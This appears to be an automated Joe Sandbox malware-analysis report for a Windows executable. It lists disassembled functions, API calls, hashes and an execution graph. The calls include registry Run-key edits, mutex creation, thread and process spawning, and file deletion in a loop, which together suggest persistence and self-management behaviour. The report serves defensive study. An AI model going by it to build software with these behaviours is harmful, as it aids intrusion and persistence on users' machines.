                                                  • Opcode ID: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                  • Instruction ID: 53b3c8965ed62865b06495ab0c988fe80dbb580c75aaeb32feec7d00177b517a
                                                  • Opcode Fuzzy Hash: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                  • Instruction Fuzzy Hash: F8E04F328145208FEB71BB69FD4595A73E4EB4D325B12086FF80DA3165CAADAC809B4D
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: <kG$@kG
                                                  • API String ID: 1881088180-1261746286
                                                  • Opcode ID: c1571aed1ada7257323e7f4019fcd83473f622e51163a971320e6dd6bf7294cc
                                                  • Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
                                                  • Opcode Fuzzy Hash: c1571aed1ada7257323e7f4019fcd83473f622e51163a971320e6dd6bf7294cc
                                                  • Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,?,0040ACEE,0000005C,?,?,?,00000000), ref: 0040B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,0040ACEE,0000005C,?,?,?,00000000), ref: 0040B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: xdF
                                                  • API String ID: 3325800564-999140092
                                                  • Opcode ID: a663eade4de274c9364800b262ed4341749ad644397e3b2b3c1635d240686f54
                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                  • Opcode Fuzzy Hash: a663eade4de274c9364800b262ed4341749ad644397e3b2b3c1635d240686f54
                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: (&O
                                                  • API String ID: 3253501508-3970044271
                                                  • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                  • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                                  • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                                  • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                  • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastRead
                                                  • String ID:
                                                  • API String ID: 4100373531-0
                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                  Execution Graph

                                                  Execution Coverage:4.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:1.5%
                                                  Total number of Nodes:1399
                                                  Total number of Limit Nodes:51
                                                  execution_graph 46950 2da4918 46951 2da4924 ___FrameUnwindToState 46950->46951 46977 2da4627 46951->46977 46954 2da492b 46955 2da4954 46954->46955 47275 2da4a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46954->47275 46961 2da4993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46955->46961 47276 2db42d2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46955->47276 46957 2da496d 46959 2da4973 ___FrameUnwindToState 46957->46959 47277 2db4276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46957->47277 46960 2da49f3 46988 2da4ba5 46960->46988 46961->46960 47278 2db3487 35 API calls 3 library calls 46961->47278 46970 2da4a15 46971 2da4a1f 46970->46971 47280 2db34bf 28 API calls _abort 46970->47280 46973 2da4a28 46971->46973 47281 2db3462 28 API calls _abort 46971->47281 47282 2da479e 13 API calls 2 library calls 46973->47282 46976 2da4a30 46976->46959 46978 2da4630 46977->46978 47283 2da4cb6 IsProcessorFeaturePresent 46978->47283 46980 2da463c 47284 2da8fb1 10 API calls 4 library calls 46980->47284 46982 2da4641 46983 2da4645 46982->46983 47285 2db415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46982->47285 46983->46954 46985 2da464e 46986 2da465c 46985->46986 47286 2da8fda 8 API calls 3 library calls 46985->47286 46986->46954 47287 2da6f10 46988->47287 46991 2da49f9 46992 2db4223 46991->46992 47289 2dbf0d9 46992->47289 46994 2da4a02 46997 2d7ea00 46994->46997 46996 2db422c 46996->46994 47293 2db6895 35 API calls 46996->47293 47295 2d8cbe1 LoadLibraryA GetProcAddress 46997->47295 46999 2d7ea1c GetModuleFileNameW 47300 2d7f3fe 46999->47300 47001 2d7ea38 47315 2d720f6 47001->47315 47004 2d720f6 28 API calls 47005 2d7ea56 47004->47005 47321 2d8beac 47005->47321 47009 2d7ea68 47347 2d71e8d 47009->47347 47011 2d7ea71 47012 2d7ea84 47011->47012 47013 2d7eace 47011->47013 47685 2d7fbee 116 API calls 47012->47685 47353 2d71e65 47013->47353 47016 2d7eade 47020 2d71e65 22 API calls 47016->47020 47017 2d7ea96 47018 2d71e65 22 API calls 47017->47018 47019 2d7eaa2 47018->47019 47686 2d80f72 36 API calls __EH_prolog 47019->47686 47021 2d7eafd 47020->47021 47358 2d7531e 47021->47358 47024 2d7eab4 47687 2d7fb9f 77 API calls 47024->47687 47025 2d7eb0c 47363 2d76383 47025->47363 47029 2d7eabd 47688 2d7f3eb 70 API calls 47029->47688 47035 2d71fd8 11 API calls 47037 2d7ef36 47035->47037 47036 2d71fd8 11 API calls 47038 2d7eb36 47036->47038 47279 2db3396 GetModuleHandleW 47037->47279 47039 2d71e65 22 API calls 47038->47039 47040 2d7eb3f 47039->47040 47380 2d71fc0 47040->47380 47042 2d7eb4a 47043 2d71e65 22 API calls 47042->47043 47044 2d7eb63 47043->47044 47045 2d71e65 22 API calls 47044->47045 47047 2d7eb7e 47045->47047 47046 2d7ebe9 47048 2d71e65 22 API calls 47046->47048 47047->47046 47689 2d76c59 47047->47689 47053 2d7ebf6 47048->47053 47050 2d7ebab 47051 2d71fe2 28 API calls 47050->47051 47052 2d7ebb7 47051->47052 47055 2d71fd8 11 API calls 47052->47055 47054 2d7ec3d 47053->47054 47384 2d83584 RegOpenKeyExA 47053->47384 47406 2d7d0a4 47054->47406 47057 2d7ebc0 47055->47057 47061 2d83584 3 API calls 47057->47061 47058 2d7ec43 47059 2d7eac6 47058->47059 47409 2d8b354 47058->47409 47059->47035 47063 2d7ebdf 47061->47063 47063->47046 47064 2d7f38a 47063->47064 47069 2d839e4 30 API calls 47064->47069 47065 2d7ec5e 47067 2d7ecb1 47065->47067 47694 2d77751 RegOpenKeyExA RegQueryValueExA RegCloseKey 47065->47694 47066 2d7ec21 47066->47054 47387 2d839e4 47066->47387 47071 2d71e65 22 API calls 47067->47071 47072 2d7f3a0 47069->47072 47074 2d7ecba 47071->47074 47724 2d824b0 65 API calls ___scrt_get_show_window_mode 47072->47724 47073 2d7ec79 47075 2d7ec87 47073->47075 47076 2d7ec7d 47073->47076 47082 2d7ecc6 47074->47082 47083 2d7eccb 47074->47083 47079 2d71e65 22 API calls 47075->47079 47695 2d77773 30 API calls 47076->47695 47091 2d7ec90 47079->47091 47080 2d7f3aa 47084 2d8bcef 28 API calls 47080->47084 47081 2d7ec82 47696 2d7729b 97 API calls 47081->47696 47698 2d77790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47082->47698 47087 2d71e65 22 API calls 47083->47087 47088 2d7f3ba 47084->47088 47089 2d7ecd4 47087->47089 47577 2d83a5e RegOpenKeyExW 47088->47577 47426 2d8bcef 47089->47426 47091->47067 47095 2d7ecac 47091->47095 47092 2d7ecdf 47430 2d71f13 47092->47430 47697 2d7729b 97 API calls 47095->47697 47099 2d71f09 11 API calls 47101 2d7f3d7 47099->47101 47103 2d71f09 11 API calls 47101->47103 47104 2d7f3e0 47103->47104 47580 2d7dd7d 47104->47580 47105 2d71e65 22 API calls 47107 2d7ecfc 47105->47107 47110 2d71e65 22 API calls 47107->47110 47112 2d7ed16 47110->47112 47111 2d7f3ea 47113 2d71e65 22 API calls 47112->47113 47114 2d7ed30 47113->47114 47115 2d71e65 22 API calls 47114->47115 47116 2d7ed49 47115->47116 47117 2d7edb6 47116->47117 47119 2d71e65 22 API calls 47116->47119 47118 2d7edc5 47117->47118 47125 2d7ef41 ___scrt_get_show_window_mode 47117->47125 47120 2d7edce 47118->47120 47148 2d7ee4a ___scrt_get_show_window_mode 47118->47148 47123 2d7ed5e _wcslen 47119->47123 47121 2d71e65 22 API calls 47120->47121 47122 2d7edd7 47121->47122 47124 2d71e65 22 API calls 47122->47124 47123->47117 47126 2d71e65 22 API calls 47123->47126 47127 2d7ede9 47124->47127 47711 2d83733 RegOpenKeyExA 47125->47711 47128 2d7ed79 47126->47128 47130 2d71e65 22 API calls 47127->47130 47131 2d71e65 22 API calls 47128->47131 47132 2d7edfb 47130->47132 47133 2d7ed8e 47131->47133 47135 2d71e65 22 API calls 47132->47135 47442 2d7da6f 47133->47442 47134 2d7ef8c 47136 2d71e65 22 API calls 47134->47136 47137 2d7ee24 47135->47137 47138 2d7efb1 47136->47138 47143 2d71e65 22 API calls 47137->47143 47500 2d72093 47138->47500 47141 2d71f13 28 API calls 47142 2d7edad 47141->47142 47145 2d71f09 11 API calls 47142->47145 47146 2d7ee35 47143->47146 47145->47117 47699 2d7ce34 45 API calls _wcslen 47146->47699 47147 2d7efc3 47506 2d837aa RegCreateKeyA 47147->47506 47700 2d83982 47148->47700 47152 2d7eede ctype 47157 2d71e65 22 API calls 47152->47157 47153 2d7ee45 47153->47148 47155 2d71e65 22 API calls 47156 2d7efe5 47155->47156 47512 2dabb2c 47156->47512 47158 2d7eef5 47157->47158 47158->47134 47162 2d7ef09 47158->47162 47161 2d7effc 47714 2d8ce2c 86 API calls ___scrt_get_show_window_mode 47161->47714 47164 2d71e65 22 API calls 47162->47164 47163 2d7f01f 47168 2d72093 28 API calls 47163->47168 47166 2d7ef12 47164->47166 47169 2d8bcef 28 API calls 47166->47169 47167 2d7f003 CreateThread 47167->47163 48570 2d8d4ee 10 API calls 47167->48570 47171 2d7f034 47168->47171 47170 2d7ef1e 47169->47170 47710 2d7f4af 110 API calls 47170->47710 47172 2d72093 28 API calls 47171->47172 47174 2d7f043 47172->47174 47516 2d8b580 47174->47516 47175 2d7ef23 47175->47134 47177 2d7ef2a 47175->47177 47177->47059 47179 2d71e65 22 API calls 47180 2d7f054 47179->47180 47181 2d71e65 22 API calls 47180->47181 47182 2d7f066 47181->47182 47183 2d71e65 22 API calls 47182->47183 47184 2d7f086 47183->47184 47185 2dabb2c 39 API calls 47184->47185 47186 2d7f093 47185->47186 47187 2d71e65 22 API calls 47186->47187 47188 2d7f09e 47187->47188 47189 2d71e65 22 API calls 47188->47189 47190 2d7f0af 47189->47190 47191 2d71e65 22 API calls 47190->47191 47192 2d7f0c4 47191->47192 47193 2d71e65 22 API calls 47192->47193 47194 2d7f0d5 47193->47194 47195 2d7f0dc StrToIntA 47194->47195 47540 2d79e1f 47195->47540 47198 2d71e65 22 API calls 47199 2d7f0f7 47198->47199 47200 2d7f103 47199->47200 47201 2d7f13c 47199->47201 47715 2da455e 22 API calls 3 library calls 47200->47715 47203 2d71e65 22 API calls 47201->47203 47205 2d7f14c 47203->47205 47204 2d7f10c 47206 2d71e65 22 API calls 47204->47206 47208 2d7f194 47205->47208 47209 2d7f158 47205->47209 47207 2d7f11f 47206->47207 47210 2d7f126 CreateThread 47207->47210 47212 2d71e65 22 API calls 47208->47212 47716 2da455e 22 API calls 3 library calls 47209->47716 47210->47201 48569 2d8a045 102 API calls __EH_prolog 47210->48569 47214 2d7f19d 47212->47214 47213 2d7f161 47215 2d71e65 22 API calls 47213->47215 47217 2d7f207 47214->47217 47218 2d7f1a9 47214->47218 47216 2d7f173 47215->47216 47221 2d7f17a CreateThread 47216->47221 47219 2d71e65 22 API calls 47217->47219 47220 2d71e65 22 API calls 47218->47220 47222 2d7f210 47219->47222 47223 2d7f1b9 47220->47223 47221->47208 48568 2d8a045 102 API calls __EH_prolog 47221->48568 47224 2d7f255 47222->47224 47225 2d7f21c 47222->47225 47226 2d71e65 22 API calls 47223->47226 47565 2d8b69e 47224->47565 47228 2d71e65 22 API calls 47225->47228 47229 2d7f1ce 47226->47229 47231 2d7f225 47228->47231 47717 2d7da23 31 API calls 47229->47717 47236 2d71e65 22 API calls 47231->47236 47232 2d71f13 28 API calls 47233 2d7f269 47232->47233 47235 2d71f09 11 API calls 47233->47235 47238 2d7f272 47235->47238 47239 2d7f23a 47236->47239 47237 2d7f1e1 47240 2d71f13 28 API calls 47237->47240 47241 2d7f27e CreateThread 47238->47241 47242 2d7f27b SetProcessDEPPolicy 47238->47242 47249 2dabb2c 39 API calls 47239->47249 47243 2d7f1ed 47240->47243 47244 2d7f293 CreateThread 47241->47244 47245 2d7f29f 47241->47245 48532 2d7f7e2 47241->48532 47242->47241 47246 2d71f09 11 API calls 47243->47246 47244->47245 48428 2d82132 GetCurrentProcessId 47244->48428 47247 2d7f2b4 47245->47247 47248 2d7f2a8 CreateThread 47245->47248 47250 2d7f1f6 CreateThread 47246->47250 47253 2d7f307 47247->47253 47254 2d72093 28 API calls 47247->47254 47248->47247 48559 2d82716 47248->48559 47251 2d7f247 47249->47251 47250->47217 48567 2d71a6d 49 API calls 47250->48567 47718 2d7c19d 7 API calls 47251->47718 47720 2d8353a RegOpenKeyExA 47253->47720 47255 2d7f2d7 47254->47255 47719 2d752fd 28 API calls 47255->47719 47260 2d7f328 47262 2d8bcef 28 API calls 47260->47262 47264 2d7f338 47262->47264 47723 2d83656 31 API calls 47264->47723 47269 2d7f34e 47270 2d71f09 11 API calls 47269->47270 47272 2d7f359 47270->47272 47271 2d7f381 DeleteFileW 47271->47272 47273 2d7f388 47271->47273 47272->47080 47272->47271 47274 2d7f36f Sleep 47272->47274 47273->47080 47274->47272 47275->46954 47276->46957 47277->46961 47278->46960 47279->46970 47280->46971 47281->46973 47282->46976 47283->46980 47284->46982 47285->46985 47286->46983 47288 2da4bb8 GetStartupInfoW 47287->47288 47288->46991 47290 2dbf0e2 47289->47290 47291 2dbf0eb 47289->47291 47294 2dbefd8 48 API calls 5 library calls 47290->47294 47291->46996 47293->46996 47294->47291 47296 2d8cc20 LoadLibraryA GetProcAddress 47295->47296 47297 2d8cc10 GetModuleHandleA GetProcAddress 47295->47297 47298 2d8cc49 44 API calls 47296->47298 47299 2d8cc39 LoadLibraryA GetProcAddress 47296->47299 47297->47296 47298->46999 47299->47298 47725 2d8b539 FindResourceA 47300->47725 47304 2d7f428 _Yarn 47737 2d720b7 47304->47737 47307 2d71fe2 28 API calls 47308 2d7f44e 47307->47308 47309 2d71fd8 11 API calls 47308->47309 47310 2d7f457 47309->47310 47311 2dabda0 ___std_exception_copy 21 API calls 47310->47311 47312 2d7f468 _Yarn 47311->47312 47743 2d76e13 47312->47743 47314 2d7f49b 47314->47001 47316 2d7210c 47315->47316 47317 2d723ce 11 API calls 47316->47317 47318 2d72126 47317->47318 47319 2d72569 28 API calls 47318->47319 47320 2d72134 47319->47320 47320->47004 47780 2d720df 47321->47780 47323 2d8bf2f 47324 2d71fd8 11 API calls 47323->47324 47325 2d8bf61 47324->47325 47327 2d71fd8 11 API calls 47325->47327 47326 2d8bf31 47328 2d741a2 28 API calls 47326->47328 47330 2d8bf69 47327->47330 47331 2d8bf3d 47328->47331 47332 2d71fd8 11 API calls 47330->47332 47333 2d71fe2 28 API calls 47331->47333 47335 2d7ea5f 47332->47335 47336 2d8bf46 47333->47336 47334 2d71fe2 28 API calls 47342 2d8bebf 47334->47342 47343 2d7fb52 47335->47343 47337 2d71fd8 11 API calls 47336->47337 47339 2d8bf4e 47337->47339 47338 2d71fd8 11 API calls 47338->47342 47788 2d8cec5 28 API calls 47339->47788 47342->47323 47342->47326 47342->47334 47342->47338 47784 2d741a2 47342->47784 47787 2d8cec5 28 API calls 47342->47787 47344 2d7fb5e 47343->47344 47346 2d7fb65 47343->47346 47795 2d72163 11 API calls 47344->47795 47346->47009 47348 2d72163 47347->47348 47352 2d7219f 47348->47352 47796 2d72730 11 API calls 47348->47796 47350 2d72184 47797 2d72712 11 API calls std::_Deallocate 47350->47797 47352->47011 47354 2d71e6d 47353->47354 47355 2d71e75 47354->47355 47798 2d72158 22 API calls 47354->47798 47355->47016 47359 2d720df 11 API calls 47358->47359 47360 2d7532a 47359->47360 47799 2d732a0 47360->47799 47362 2d75346 47362->47025 47804 2d751ef 47363->47804 47365 2d76391 47808 2d72055 47365->47808 47368 2d71fe2 47369 2d71ff1 47368->47369 47370 2d72039 47368->47370 47371 2d723ce 11 API calls 47369->47371 47377 2d71fd8 47370->47377 47372 2d71ffa 47371->47372 47373 2d7203c 47372->47373 47374 2d72015 47372->47374 47375 2d7267a 11 API calls 47373->47375 47823 2d73098 28 API calls 47374->47823 47375->47370 47378 2d723ce 11 API calls 47377->47378 47379 2d71fe1 47378->47379 47379->47036 47381 2d71fd2 47380->47381 47382 2d71fc9 47380->47382 47381->47042 47824 2d725e0 28 API calls 47382->47824 47385 2d835db 47384->47385 47386 2d835ae RegQueryValueExA RegCloseKey 47384->47386 47385->47066 47386->47385 47388 2d72093 28 API calls 47387->47388 47389 2d839f9 47388->47389 47390 2d72093 28 API calls 47389->47390 47391 2d83a02 47390->47391 47392 2d8bcef 28 API calls 47391->47392 47393 2d83a0d 47392->47393 47394 2d8bcef 28 API calls 47393->47394 47395 2d83a20 47394->47395 47396 2d83a5e 2 API calls 47395->47396 47397 2d83a33 47396->47397 47398 2d71f09 11 API calls 47397->47398 47399 2d83a3e 47398->47399 47400 2d71f09 11 API calls 47399->47400 47401 2d83a46 47400->47401 47402 2d71fd8 11 API calls 47401->47402 47403 2d83a4e 47402->47403 47404 2d71fd8 11 API calls 47403->47404 47405 2d83a56 47404->47405 47405->47054 47825 2d71fab 47406->47825 47408 2d7d0ae CreateMutexA GetLastError 47408->47058 47827 2d8c048 47409->47827 47414 2d71fe2 28 API calls 47415 2d8b390 47414->47415 47416 2d71fd8 11 API calls 47415->47416 47417 2d8b398 47416->47417 47418 2d835e1 31 API calls 47417->47418 47420 2d8b3ee 47417->47420 47419 2d8b3c1 47418->47419 47421 2d8b3cc StrToIntA 47419->47421 47420->47065 47422 2d8b3da 47421->47422 47423 2d8b3e3 47421->47423 47835 2d8cffa 22 API calls 47422->47835 47425 2d71fd8 11 API calls 47423->47425 47425->47420 47427 2d8bd03 47426->47427 47836 2d7b93f 47427->47836 47429 2d8bd0b 47429->47092 47431 2d71f22 47430->47431 47432 2d71f6a 47430->47432 47433 2d72252 11 API calls 47431->47433 47439 2d71f09 47432->47439 47434 2d71f2b 47433->47434 47435 2d71f6d 47434->47435 47436 2d71f46 47434->47436 47869 2d72336 47435->47869 47868 2d7305c 28 API calls 47436->47868 47440 2d72252 11 API calls 47439->47440 47441 2d71f12 47440->47441 47441->47105 47873 2d71f86 47442->47873 47445 2d7dae0 47449 2d8c048 GetCurrentProcess 47445->47449 47446 2d7daab 47883 2d8b645 29 API calls 47446->47883 47447 2d7dbd4 GetLongPathNameW 47877 2d7417e 47447->47877 47448 2d7daa1 47448->47447 47452 2d7dae5 47449->47452 47455 2d7db3b 47452->47455 47456 2d7dae9 47452->47456 47453 2d7dab4 47457 2d71f13 28 API calls 47453->47457 47459 2d7417e 28 API calls 47455->47459 47460 2d7417e 28 API calls 47456->47460 47495 2d7dabe 47457->47495 47458 2d7417e 28 API calls 47461 2d7dbf8 47458->47461 47465 2d7db49 47459->47465 47466 2d7daf7 47460->47466 47886 2d7de0c 28 API calls 47461->47886 47462 2d71f09 11 API calls 47462->47448 47464 2d7dc0b 47887 2d72fa5 28 API calls 47464->47887 47468 2d7417e 28 API calls 47465->47468 47469 2d7417e 28 API calls 47466->47469 47471 2d7db5f 47468->47471 47472 2d7db0d 47469->47472 47470 2d7dc16 47888 2d72fa5 28 API calls 47470->47888 47885 2d72fa5 28 API calls 47471->47885 47884 2d72fa5 28 API calls 47472->47884 47476 2d7db6a 47479 2d71f13 28 API calls 47476->47479 47477 2d7db18 47480 2d71f13 28 API calls 47477->47480 47478 2d7dc20 47481 2d71f09 11 API calls 47478->47481 47483 2d7db75 47479->47483 47484 2d7db23 47480->47484 47482 2d7dc2a 47481->47482 47485 2d71f09 11 API calls 47482->47485 47486 2d71f09 11 API calls 47483->47486 47487 2d71f09 11 API calls 47484->47487 47488 2d7dc33 47485->47488 47489 2d7db7e 47486->47489 47490 2d7db2c 47487->47490 47491 2d71f09 11 API calls 47488->47491 47492 2d71f09 11 API calls 47489->47492 47493 2d71f09 11 API calls 47490->47493 47494 2d7dc3c 47491->47494 47492->47495 47493->47495 47496 2d71f09 11 API calls 47494->47496 47495->47462 47497 2d7dc45 47496->47497 47498 2d71f09 11 API calls 47497->47498 47499 2d7dc4e 47498->47499 47499->47141 47501 2d7209b 47500->47501 47502 2d723ce 11 API calls 47501->47502 47503 2d720a6 47502->47503 47912 2d724ed 47503->47912 47507 2d837fa 47506->47507 47508 2d837c3 47506->47508 47509 2d71fd8 11 API calls 47507->47509 47511 2d837d5 RegSetValueExA RegCloseKey 47508->47511 47510 2d7efd9 47509->47510 47510->47155 47511->47507 47513 2dabb45 _swprintf 47512->47513 47916 2daae83 47513->47916 47515 2d7eff2 47515->47161 47515->47163 47517 2d8b631 47516->47517 47518 2d8b596 GetLocalTime 47516->47518 47520 2d71fd8 11 API calls 47517->47520 47519 2d7531e 28 API calls 47518->47519 47521 2d8b5d8 47519->47521 47522 2d8b639 47520->47522 